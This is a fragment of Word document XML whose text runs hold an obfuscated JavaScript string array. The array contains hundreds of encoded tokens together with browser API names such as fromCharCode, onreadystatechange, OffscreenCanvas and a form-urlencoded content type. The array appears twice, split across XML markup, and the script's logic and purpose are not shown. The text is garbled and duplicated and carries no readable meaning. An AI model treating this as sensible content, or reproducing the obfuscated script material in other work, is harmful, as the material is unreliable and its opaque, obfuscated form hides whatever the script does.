      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kesn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YR